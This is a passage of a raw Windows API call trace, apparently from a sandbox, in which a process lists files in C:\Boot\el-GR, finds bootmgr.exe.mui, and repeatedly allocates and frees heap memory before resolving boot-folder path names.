ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.492] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.492] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.492] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.492] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.492] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.492] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.493] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.493] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.494] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.494] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.495] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.495] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.496] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.496] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.497] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.497] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.498] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.498] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.499] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.499] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0228.499] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.499] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.499] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.499] PathFindFileNameW 